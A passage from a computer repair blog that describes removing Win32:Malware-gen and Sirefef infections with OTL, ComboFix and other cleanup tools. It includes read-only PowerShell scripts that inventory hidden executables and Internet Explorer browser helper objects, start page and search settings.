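    # Unsigned or mismatched binaries sort first so they are reviewed first
    $Findings | Sort-Object Signature, Path | Format-Table -AutoSize
} else {
    'No hidden+system executables found under the scanned roots.'
}
```

Plain hidden files (desktop.ini, thumbnail caches) are normal in these folders, which is why the filter keeps only executable extensions with both attributes set.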

This computer now boots and runs well.

Posted in Virus, Malware And Spyware Removal

On-the-job evaluation and removal of the widespread Win32:Malware-gen malware.

An interesting afternoon, without a doubt. Two customers contacted us today, both with computers apparently infected by the now common Win32:Malware-gen trojan.

Both customers described regular alerts from their anti-malware software (Kaspersky and Avast) and sluggish, bordering on unusable, computers. Win32:Malware-gen represents a dangerous attack on the system. Besides slowing the machine down, the malware can be used to redirect web searches and to install backdoors and keyloggers. If left unmitigated, it can lead to a complete OS breakdown.

As usual, I start by loading the essential diagnostic tools: Avast, Autoruns, ComboFix, OTL, and Malwarebytes. It's worth noting that I always download the latest versions of these tools before starting any repair.

The first phase is an OTL scan. I expect to find a file in the C:\Windows\Installer directory. Sure enough, in both cases the OTL log shows corrupted files in the C:\Windows\Installer and C:\Windows\assembly directories. In addition, one system had a corrupted file in the C:\Users\[USER]\AppData\Local directory. I write a repair script and run an OTL fix for these issues.

Next, I run a ComboFix scan, which examines and restores the services.exe system file. At this point everything looks good. I run one more scan of the system with Avast to make sure no further malware is left behind. Both computers now run close to perfectly. I perform a few "spring cleaning" tasks such as installing Malwarebytes and the FileHippo update checker. I also apply a number of Windows updates to one machine.

Posted in Virus, Malware And Spyware Removal

In-the-field evaluation and removal of the "Sirefef" Trojan.

A new customer contacted me recently to describe various alerts her anti-malware had produced over the previous 24 hours; in this case her anti-virus application was AVG.

She reported alerts with virus descriptions such as Win64:Sirefef-A, Win64:Sirefef-AO, and Win32:Malware-gen. I immediately recognized these warnings as signs of the Sirefef virus. Sirefef is a nasty piece of malware that installs rootkits, modifies registry settings, and alters important Windows system files such as services.exe. If left unattended, Sirefef can cause a full system crash. Some variants include backdoors and keyloggers that can be used to gain access to confidential data such as passwords, credit card numbers, and bank account information.

Indicators of the Sirefef Trojan include: redirected web searches, an altered browser homepage, a changed desktop background image, slower PC performance, and unprompted pop-up windows.

I start by copying the usual analysis and repair tools to the infected computer from a removable drive; the tools consisted of Avast, Autoruns, ComboFix, OTL, and Malwarebytes. It's important to note that I rename combofix.exe before copying it to the infected PC.

My first action is a system scan with OTL. Here, the OTL log revealed unwanted changes to the Internet Explorer registry values, unwanted browser helper objects, and unneeded ActiveX components. I proceed by scripting and applying an OTL fix.
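As an added example (not from the original post, and not what OTL itself does), this PowerShell script takes a read-only inventory of the Internet Explorer settings the OTL log flagged: the registered browser helper objects with the DLL behind each CLSID and its signature status, the start page, and the search scopes. The registry paths are the standard IE locations; the output format is an assumption.

```powershell
# Added example, not from the original post: inventory IE BHOs, start page and
# search scopes so unwanted entries can be reviewed before a fix is scripted.
# Read-only; nothing is changed or deleted.
$BhoKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects'
)
# A BHO entry is only a CLSID; the implementing DLL is registered under Classes\CLSID
$ClsidRoots = @('HKLM:\SOFTWARE\Classes\CLSID', 'HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID')

$Bhos = foreach ($Key in $BhoKeys) {
    if (-not (Test-Path -LiteralPath $Key)) { continue }
    foreach ($Entry in Get-ChildItem -LiteralPath $Key) {
        $Clsid = $Entry.PSChildName
        $Dll = $null
        foreach ($Root in $ClsidRoots) {
            $Server = Get-ItemProperty -LiteralPath "$Root\$Clsid\InprocServer32" -ErrorAction SilentlyContinue
            if ($Server) { $Dll = [Environment]::ExpandEnvironmentVariables($Server.'(default)'); break }
        }
        # An unsigned DLL, or a CLSID whose DLL no longer exists, deserves a closer look
        $Sig = if ($Dll -and (Test-Path -LiteralPath $Dll)) {
            (Get-AuthenticodeSignature -FilePath $Dll).Status
        } else { 'DLL missing' }
        [pscustomobject]@{ CLSID = $Clsid; Dll = $Dll; Signature = $Sig }
    }
}
'--- Browser Helper Objects ---'
$Bhos | Format-Table -AutoSize

# Start page: anything the user did not choose herself is suspect
'--- Start page ---'
Get-ItemProperty -LiteralPath 'HKCU:\Software\Microsoft\Internet Explorer\Main' |
    Select-Object 'Start Page', 'Default_Page_URL' | Format-List

# Search scopes: a redirected default search provider shows up here
'--- Search scopes ---'
$Scopes = 'HKCU:\Software\Microsoft\Internet Explorer\SearchScopes'
if (Test-Path -LiteralPath $Scopes) {
    Get-ChildItem -LiteralPath $Scopes | ForEach-Object {
        Get-ItemProperty -LiteralPath $_.PSPath | Select-Object DisplayName, URL
    } | Format-Table -AutoSize
}
```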

Next, I disable all running anti-virus and anti-malware applications and begin a scan and repair with ComboFix. Keep in mind that ComboFix can behave unpredictably during a scan, so it's best to leave it alone until it completes. ComboFix found several files for removal in the following directories: C:\data, C:\Documents and Settings, C:\Windows\Downloaded Program Files, and C:\Windows\Installer.

I run one more scan of the computer with Avast, which finds no additional threats. I finish with a few more tweaks: updating Java, installing Malwarebytes and the FileHippo update checker, and verifying that Windows is up to date.

Posted in Virus, Malware And Spyware Removal